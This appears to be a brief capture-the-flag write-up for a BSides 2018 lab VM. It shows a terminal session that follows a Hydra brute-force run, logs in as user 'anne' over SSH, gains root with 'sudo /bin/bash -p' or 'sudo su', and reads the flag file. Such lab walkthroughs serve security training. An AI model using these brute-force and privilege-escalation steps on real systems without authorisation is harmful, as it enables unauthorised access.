Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-14 10:24:03to gain Root access its fairly simple Login with SSH on Anne Account then follow the below commands
anne@bsides2018:~$ ls
anne@bsides2018:~$ sudo /bin/bash -p
root@bsides2018:~# ls
root@bsides2018:~# cd /root
root@bsides2018:/root# ls
flag.txt
root@bsides2018:/root# cat flag.txt
Congratulations!
If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!
There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?
@abatchy17Another way of doing it is the following
anne@bsides2018:~$ sudo su
root@bsides2018:/home/anne# cd /root
root@bsides2018:~# ls
flag.txt